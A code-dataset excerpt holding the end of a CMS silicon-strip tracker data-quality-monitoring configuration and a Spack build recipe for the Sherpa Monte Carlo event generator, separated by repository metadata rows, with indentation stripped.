process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('NOT (36 OR 37 OR 38 OR 39)')
# HLT trigger selection (HLT_ZeroBias)
# modified for 0 Tesla HLT menu (no ZeroBias_*)
process.load('HLTrigger.HLTfilters.hltHighLevel_cfi')
if (process.runType.getRunType() == process.runType.hi_run):
#--------------------------
# HI Runs HLT path
#--------------------------
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias_*' , 'HLT_HIZeroBias*' , 'HLT_ZeroBias1_*' , 'HLT_PAZeroBias_*' , 'HLT_PAZeroBias1_*', 'HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_*' , 'HLT_HICentralityVeto*','HLT_HIMinimumBias*', 'HLT_HIPhysics*')
else:
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias_*' , 'HLT_ZeroBias1_*' , 'HLT_PAZeroBias_*' , 'HLT_PAZeroBias1_*', 'HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_*')
process.hltHighLevel.andOr = cms.bool(True)
process.hltHighLevel.throw = cms.bool(False)
#--------------------------
# Scheduling
#--------------------------
process.SiStripSources_LocalReco = cms.Sequence(process.siStripFEDMonitor*process.SiStripMonitorDigi*process.SiStripMonitorClusterReal)
process.DQMCommon = cms.Sequence(process.stripQTester*process.trackingQTester*process.dqmEnv*process.dqmEnvTr*process.dqmSaver)
if (process.runType.getRunType() == process.runType.hi_run):
process.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.trackerlocalreco)
else :
process.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.gtDigis*process.trackerlocalreco)
#------------------------------------------------------
# Switch for channel errors per FED ID trend plots.
#------------------------------------------------------
process.siStripFEDMonitor.fedErrorsVsIdVsLumiHistogramConfig.globalswitchon = cms.untracked.bool(True)
#--------------------------
# Global Plot Switches
#--------------------------
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.subdetswitchon = cms.bool(False)
### COSMIC RUN SETTING
if (process.runType.getRunType() == process.runType.cosmic_run or process.runType.getRunType() == process.runType.cosmic_run_stage1):
# event selection for cosmic data
if ((process.runType.getRunType() == process.runType.cosmic_run) and live): process.source.SelectEvents = cms.untracked.vstring('HLT*SingleMu*','HLT_L1*')
# Reference run for cosmic
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_cosmic.root'
# Source config for cosmic data
process.SiStripSources_TrkReco_cosmic = cms.Sequence(process.SiStripMonitorTrack_ckf*process.TrackMon_ckf)
# Client config for cosmic data
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_Cosmic_cff")
process.SiStripAnalyserCosmic.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyserCosmic.TkMapCreationFrequency = -1
process.SiStripAnalyserCosmic.ShiftReportFrequency = -1
process.SiStripAnalyserCosmic.StaticUpdateFrequency = 5
process.SiStripAnalyserCosmic.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyserCosmic)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_Cosmic_cff")
process.TrackingAnalyserCosmic.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.TrackingAnalyserCosmic.ShiftReportFrequency = -1
process.TrackingAnalyserCosmic.StaticUpdateFrequency = 5
process.TrackingClient = cms.Sequence( process.TrackingAnalyserCosmic )
# Reco for cosmic data
process.load('RecoTracker.SpecialSeedGenerators.SimpleCosmicBONSeeder_cfi')
process.simpleCosmicBONSeeds.ClusterCheckPSet.MaxNumberOfCosmicClusters = 450
process.combinatorialcosmicseedfinderP5.MaxNumberOfCosmicClusters = 450
process.RecoForDQM_TrkReco_cosmic = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEvent*process.ctftracksP5)
process.stripQTester.qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config_cosmic.xml')
process.stripQTester.prescaleFactor = cms.untracked.int32(2)
process.stripQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.stripQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.stripQTester.qtestOnEndRun = cms.untracked.bool(True)
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config_cosmic.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
process.p = cms.Path(process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.RecoForDQM_TrkReco_cosmic*
process.SiStripSources_TrkReco_cosmic*
process.TrackingClient
)
#else :
### pp COLLISION SETTING
if (process.runType.getRunType() == process.runType.pp_run or process.runType.getRunType() == process.runType.pp_run_stage1):
#event selection for pp collisions
if ((process.runType.getRunType() == process.runType.pp_run) and live):
process.source.SelectEvents = cms.untracked.vstring(
'HLT_L1*',
'HLT_Jet*',
'HLT_Physics*',
'HLT_ZeroBias*',
'HLT_PAL1*',
'HLT_PAZeroBias*',
'HLT_PAAK*'
)
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
# Source and Client config for pp collisions
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('initialStepTracksPreSplitting')
process.TrackMon_gentk.TrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.TrackMon_gentk.allTrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.SiStripMonitorTrack_gentk.TrackProducer = 'initialStepTracksPreSplitting'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.integrateNLumisections = cms.int32(25)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
if offlineTesting :
process.TrackingAnalyser.verbose = cms.untracked.bool(True)
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
# Reco for pp collisions
process.load('RecoTracker.IterativeTracking.InitialStepPreSplitting_cff')
'''process.InitialStepPreSplitting.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplitting.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplitting.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplitting.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplitting.remove(process.siPixelClusters)
process.InitialStepPreSplitting.remove(process.siPixelRecHits)
process.InitialStepPreSplitting.remove(process.MeasurementTrackerEvent)
process.InitialStepPreSplitting.remove(process.siPixelClusterShapeCache)'''
process.InitialStepPreSplittingTask.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplittingTask.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplittingTask.remove(process.siPixelClusters)
process.InitialStepPreSplittingTask.remove(process.siPixelRecHits)
process.InitialStepPreSplittingTask.remove(process.MeasurementTrackerEvent)
# Redefinition of siPixelClusters: has to be after RecoTracker.IterativeTracking.InitialStepPreSplitting_cff
process.load("RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi")
from RecoTracker.TkSeedingLayers.PixelLayerTriplets_cfi import *
process.PixelLayerTriplets.BPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
process.PixelLayerTriplets.FPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
from RecoPixelVertexing.PixelTrackFitting.PixelTracks_cff import *
process.pixelTracksHitTriplets.SeedComparitorPSet.clusterShapeCacheSrc = 'siPixelClusterShapeCachePreSplitting'
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEventPreSplitting*process.siPixelClusterShapeCachePreSplitting*process.recopixelvertexing*process.InitialStepPreSplitting)
process.p = cms.Path(
process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.siPixelClusters*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
##### TRIGGER SELECTION #####
process.hltHighLevel*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
#--------------------------------------------------
# For high PU run - no tracking in cmssw42x
#--------------------------------------------------
if (process.runType.getRunType() == process.runType.hpu_run):
# Simple filter for event
# 2012.07.09 highPU fill should have /cdaq/special/HighPUFill/July2012/HLT/V6 as trigger table
# where HLT_ZeroBias in the DQM stream has ~50Hz
# the expected reconstruction time should be ~ several seconds
# => PRESCALE = 50
# but try firstly w/ 30, maybe it is enough
process.eventFilter.EventsToSkip = cms.untracked.int32(30)
# change the HLT trigger path selection
# it should already be ok, but the name could be changed
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias*' )
# process.DQMEventStreamerReader.SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('HLT_600Tower*','HLT_L1*','HLT_Jet*','HLT_HT*','HLT_MinBias_*','HLT_Physics*', 'HLT_ZeroBias*'))
#
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'earlyGeneralTracks'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'earlyGeneralTracks'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('earlyGeneralTracks')
process.TrackMon_gentk.TrackProducer = cms.InputTag("earlyGeneralTracks")
process.TrackMon_gentk.allTrackProducer = cms.InputTag("earlyGeneralTracks")
process.SiStripMonitorTrack_gentk.TrackProducer = 'earlyGeneralTracks'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
# Reco for pp collisions
process.load('RecoTracker.Configuration.RecoTracker_cff')
#process.newCombinedSeeds.seedCollections = cms.VInputTag(
# cms.InputTag('initialStepSeeds'),
# )
process.load('RecoTracker.FinalTrackSelectors.MergeTrackCollections_cff')
import RecoTracker.FinalTrackSelectors.earlyGeneralTracks_cfi
process.load('RecoTracker.FinalTrackSelectors.earlyGeneralTracks_cfi')
process.earlyGeneralTracks.TrackProducers = (
cms.InputTag('initialStepTracks'),
)
process.earlyGeneralTracks.hasSelector=cms.vint32(1)
process.earlyGeneralTracks.selectedTrackQuals = cms.VInputTag(
# cms.InputTag("initialStepSelector","initialStep"),
cms.InputTag("initialStep"),
)
process.earlyGeneralTracks.setsToMerge = cms.VPSet( cms.PSet( tLists=cms.vint32(0), pQual=cms.bool(True) ) )
process.load("RecoTracker.IterativeTracking.iterativeTk_cff")
process.iterTracking_FirstStep =cms.Sequence(
process.InitialStep
*process.earlyGeneralTracks
)
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEvent*process.siPixelClusterShapeCache*process.recopixelvertexing*process.iterTracking_FirstStep)
process.p = cms.Path(process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.hltHighLevel*
process.eventFilter*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
process.castorDigis.InputLabel = cms.InputTag("rawDataCollector")
process.csctfDigis.producer = cms.InputTag("rawDataCollector")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataCollector")
process.ecalDigis.InputLabel = cms.InputTag("rawDataCollector")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataCollector")
process.gctDigis.inputLabel = cms.InputTag("rawDataCollector")
process.gtDigis.DaqGtInputTag = cms.InputTag("rawDataCollector")
process.hcalDigis.InputLabel = cms.InputTag("rawDataCollector")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataCollector")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataCollector")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataCollector")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataCollector")
process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector")
process.siStripDigis.ProductLabel = cms.InputTag("rawDataCollector")
process.siStripFEDMonitor.RawDataTag = cms.untracked.InputTag("rawDataCollector")
#--------------------------------------------------
# Heavy Ion Specific Fed Raw Data Collection Label
#--------------------------------------------------
print("Running with run type = ", process.runType.getRunType())
### HEAVY ION SETTING
if (process.runType.getRunType() == process.runType.hi_run):
process.castorDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.csctfDigis.producer = cms.InputTag("rawDataRepacker")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataRepacker")
process.ecalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataRepacker")
process.gctDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.hcalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataRepacker")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataRepacker")
process.siPixelDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.siStripDigis.ProductLabel = cms.InputTag("rawDataRepacker")
process.siStripFEDMonitor.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
if ((process.runType.getRunType() == process.runType.hi_run) and live):
process.source.SelectEvents = cms.untracked.vstring(
'HLT_HICentralityVeto*',
# 'HLT_HIMinimumBias*',
# 'HLT_HIZeroBias*'
'HLT_HIPhysics*'
)
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('initialStepTracksPreSplitting')
process.TrackMon_gentk.TrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.TrackMon_gentk.allTrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.SiStripMonitorTrack_gentk.TrackProducer = 'initialStepTracksPreSplitting'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.integrateNLumisections = cms.int32(25)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
if offlineTesting :
process.TrackingAnalyser.verbose = cms.untracked.bool(True)
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
process.stripQTester.qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config_heavyion.xml')
process.stripQTester.prescaleFactor = cms.untracked.int32(2)
process.stripQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.stripQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.stripQTester.qtestOnEndRun = cms.untracked.bool(True)
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config_heavyion.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
# Reco for pp collisions
process.load('RecoTracker.IterativeTracking.InitialStepPreSplitting_cff')
'''process.InitialStepPreSplitting.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplitting.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplitting.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplitting.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplitting.remove(process.siPixelClusters)
process.InitialStepPreSplitting.remove(process.siPixelRecHits)
process.InitialStepPreSplitting.remove(process.MeasurementTrackerEvent)
process.InitialStepPreSplitting.remove(process.siPixelClusterShapeCache)'''
process.InitialStepPreSplittingTask.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplittingTask.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplittingTask.remove(process.siPixelClusters)
process.InitialStepPreSplittingTask.remove(process.siPixelRecHits)
process.InitialStepPreSplittingTask.remove(process.MeasurementTrackerEvent)
# Redefinition of siPixelClusters: has to be after RecoTracker.IterativeTracking.InitialStepPreSplitting_cff
process.load("RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi")
# Select events based on the pixel cluster multiplicity
import HLTrigger.special.hltPixelActivityFilter_cfi
process.multFilter = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone(
inputTag = cms.InputTag('siPixelClusters'),
minClusters = cms.uint32(1),
maxClusters = cms.uint32(50000)
)
# BaselineValidator Module
from EventFilter.SiStripRawToDigi.SiStripDigis_cfi import siStripDigis as _siStripDigis
process.siStripDigisNoZS=_siStripDigis.clone()
process.siStripDigisNoZS.ProductLabel = cms.InputTag("rawDataCollector")
process.SiStripBaselineValidator.srcProcessedRawDigi = cms.InputTag('siStripDigisNoZS','ZeroSuppressed')
from RecoTracker.TkSeedingLayers.PixelLayerTriplets_cfi import *
process.PixelLayerTriplets.BPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
process.PixelLayerTriplets.FPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
from RecoPixelVertexing.PixelTrackFitting.PixelTracks_cff import *
process.pixelTracksHitTriplets.SeedComparitorPSet.clusterShapeCacheSrc = 'siPixelClusterShapeCachePreSplitting'
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEventPreSplitting*process.siPixelClusterShapeCachePreSplitting*process.recopixelvertexing*process.InitialStepPreSplitting)
process.p = cms.Path(
process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.siStripDigisNoZS*
process.SiStripBaselineValidator*
process.RecoForDQM_LocalReco*
process.siPixelClusters*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.multFilter*
##### TRIGGER SELECTION #####
process.hltHighLevel*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
### process customizations included here
from DQM.Integration.config.online_customizations_cfi import *
process = customise(process)
| 50.51932
| 261
| 0.73533
|
4a18ba430a346f2d7651e2fe26e33fa186d1de08
| 7,221
|
py
|
Python
|
var/spack/repos/builtin/packages/sherpa/package.py
|
varioustoxins/spack
|
cab0e4cb240f34891a6d753f3393e512f9a99e9a
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/sherpa/package.py
|
varioustoxins/spack
|
cab0e4cb240f34891a6d753f3393e512f9a99e9a
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6
|
2022-01-08T08:41:11.000Z
|
2022-03-14T19:28:07.000Z
|
var/spack/repos/builtin/packages/sherpa/package.py
|
foeroyingur/spack
|
5300cbbb2e569190015c72d0970d25425ea38647
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Sherpa(AutotoolsPackage):
"""Sherpa is a Monte Carlo event generator for the Simulation of
High-Energy Reactions of PArticles in lepton-lepton, lepton-photon,
photon-photon, lepton-hadron and hadron-hadron collisions."""
homepage = "https://sherpa-team.gitlab.io"
url = "https://gitlab.com/sherpa-team/sherpa/-/archive/v2.2.11/sherpa-v2.2.11.tar.gz"
list_url = "https://gitlab.com/sherpa-team/sherpa/-/tags"
git = "https://gitlab.com/sherpa-team/sherpa.git"
tags = ['hep', 'eic']
maintainers = ['wdconinc', 'vvolkl']
version('2.2.12', sha256='4ba78098e45aaac0bc303d1b5abdc15809f30b407abf9457d99b55e63384c83d')
version('2.2.11', sha256='5e12761988b41429f1d104f84fdf352775d233cde7a165eb64e14dcc20c3e1bd')
version('2.2.10', sha256='ae23bc8fdcc9f8c26becc41692822233b62203cd72a7e0dab2ca19316aa0aad7')
version('2.2.9', sha256='ebc836d42269a0c4049d3fc439a983d19d12595d9a06db2d18765bd1e301923e')
version('2.2.8', sha256='ff198cbae5de445e6fe383151021ef24b1628dffc0da6bf3737753f6672a0091')
version('2.0.0', sha256='0e873b27bb1be46ca5ed451d1b8514ca84c10221057b11be5952180076e6f848')
version('1.3.1', sha256='31881207838d341358db64e3fdadfeee1ea2f6d1cb42f370014f622f579159ae')
version('1.3.0', sha256='08b13c65b66f2edde6996d2a06762a12a0682ffb64bca43654df47321e5039a0')
version('1.2.3', sha256='029727337a430d6675a1a12dce3ced0411041e79ddaf4ce3b9466035cf6c8804')
version('1.2.2', sha256='6e7b5ea80b99f1378519009e494030d6cf4c4491f91218d749eabb8ffaad9ac1')
version('1.2.1', sha256='838462f4a1e8768135363aa6b8532fd8f5e5789a269b858f8e3728ab37f6a1d1')
version('1.2.0', sha256='509508fd0ad72aaf55ab484da8b6bc0b31688c955adcda62a3e8f94689cebf99')
version('1.1.3', sha256='6335e5eb1fc304e9618496d3ddb198b3591e57b27db6e876af8fd649a8b98c93')
version('1.1.2', sha256='e1689cad6700dc013af0afb0d33729ac2b5e9841d2f325c85b10d773e7f8a80e')
version('1.1.1', sha256='b80e1d75934be79b73400d2c95d96e88651626ea29ddcb9d8fde9c1812039e29')
version('1.1.0', sha256='8052d137d668353dc710f8691b921e772820d39e20361f0d616ee2da1ac798f2')
version('1.0.9', sha256='fe28db91ea8264364395c7e5efeeae3e5c01ea1343e0db7fe13924c6f17fb963')
version('1.0.8', sha256='6e346bafd13b5b05ad566a73759da6d5e64d65c5036780cc4911d93277e891fa')
version('1.0.7', sha256='d1eeefd96c6822ea8eb926447ca91ec4a1c714e4746323e92b1e17764e51ff0b')
version('1.0.6', sha256='358d417ec3afde24618c222bc9b742bc5102d435622b3cd6f2e3f72d03656255')
_cxxstd_values = ('11', '14', '17')
variant('cxxstd', default='11', values=_cxxstd_values, multi=False,
description='Use the specified C++ standard when building')
variant('analysis', default=True, description='Enable analysis components')
variant('mpi', default=False, description='Enable MPI')
variant('python', default=False, description='Enable Python API')
variant('hepmc2', default=True, description='Enable HepMC (version 2.x) support')
variant('hepmc3', default=True, description='Enable HepMC (version 3.x) support')
variant('hepmc3root', default=False, description='Enable HepMC (version 3.1+) ROOT support')
variant('rivet', default=False, description='Enable Rivet support')
variant('fastjet', default=True, description='Enable FASTJET')
variant('openloops', default=False, description='Enable OpenLoops')
variant('recola', default=False, description='Enable Recola')
variant('lhole', default=False, description='Enable Les Houches One-Loop Generator interface')
variant('root', default=False, description='Enable ROOT support')
variant('lhapdf', default=True, description='Enable LHAPDF support')
variant('gzip', default=False, description='Enable gzip support')
variant('pythia', default=True, description='Enable fragmentation/decay interface to Pythia')
# Note that the delphes integration seems utterly broken: https://sherpa.hepforge.org/trac/ticket/305
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('texinfo', type='build')
depends_on('sqlite')
depends_on('mpi', when='+mpi')
depends_on('python', when='+python')
depends_on('swig', when='+python', type='build')
depends_on('hepmc', when='+hepmc2')
depends_on('hepmc3', when='+hepmc3')
depends_on('hepmc3 +rootio', when='+hepmc3root')
depends_on('rivet', when='+rivet')
depends_on('fastjet', when='+fastjet')
depends_on('openloops', when='+openloops')
depends_on('recola', when='+recola')
depends_on('root', when='+root')
depends_on('lhapdf', when='+lhapdf')
depends_on('gzip', when='+gzip')
depends_on('pythia6', when='+pythia')
for std in _cxxstd_values:
depends_on('root cxxstd=' + std, when='+root cxxstd=' + std)
def patch(self):
filter_file(r'#include <sys/sysctl.h>',
'#ifdef ARCH_DARWIN\n#include <sys/sysctl.h>\n#endif',
'ATOOLS/Org/Run_Parameter.C')
def configure_args(self):
args = []
args.append('--enable-shared')
args.append('--enable-binreloc')
args.append('--enable-static')
args.append('--enable-hepevtsize=200000')
args.append('--with-sqlite3=' + self.spec['sqlite'].prefix)
args.extend(self.enable_or_disable('mpi'))
if self.spec.satisfies('+python'):
args.append('--enable-pyext')
args.extend(self.enable_or_disable('analysis'))
args.extend(self.enable_or_disable('lhole'))
args.extend(self.enable_or_disable('gzip'))
args.extend(self.enable_or_disable('pythia'))
if self.spec.satisfies('+hepmc2'):
args.append('--enable-hepmc2=' + self.spec['hepmc'].prefix)
if self.spec.satisfies('+hepmc3'):
args.append('--enable-hepmc3=' + self.spec['hepmc3'].prefix)
if self.spec.satisfies('+rivet'):
args.append('--enable-rivet=' + self.spec['rivet'].prefix)
if self.spec.satisfies('+fastjet'):
args.append('--enable-fastjet=' + self.spec['fastjet'].prefix)
if self.spec.satisfies('+openloops'):
args.append('--enable-openloops=' + self.spec['openloops'].prefix)
if self.spec.satisfies('+recola'):
args.append('--enable-recola=' + self.spec['recola'].prefix)
if self.spec.satisfies('+root'):
args.append('--enable-root=' + self.spec['root'].prefix)
if self.spec.satisfies('+lhapdf'):
args.append('--enable-lhapdf=' + self.spec['lhapdf'].prefix)
if self.spec.satisfies('+hztool'):
args.append('--enable-hztool=' + self.spec['hztool'].prefix)
if self.spec.satisfies('+cernlib'):
args.append('--enable-cernlib=' + self.spec['cernlib'].prefix)
return args
| 55.546154
| 105
| 0.689932
|
4a18ba84f4cb1d725b674a908e7491effee8c85f
| 2,162
|
py
|
Python
|
loquat/handler.py
|
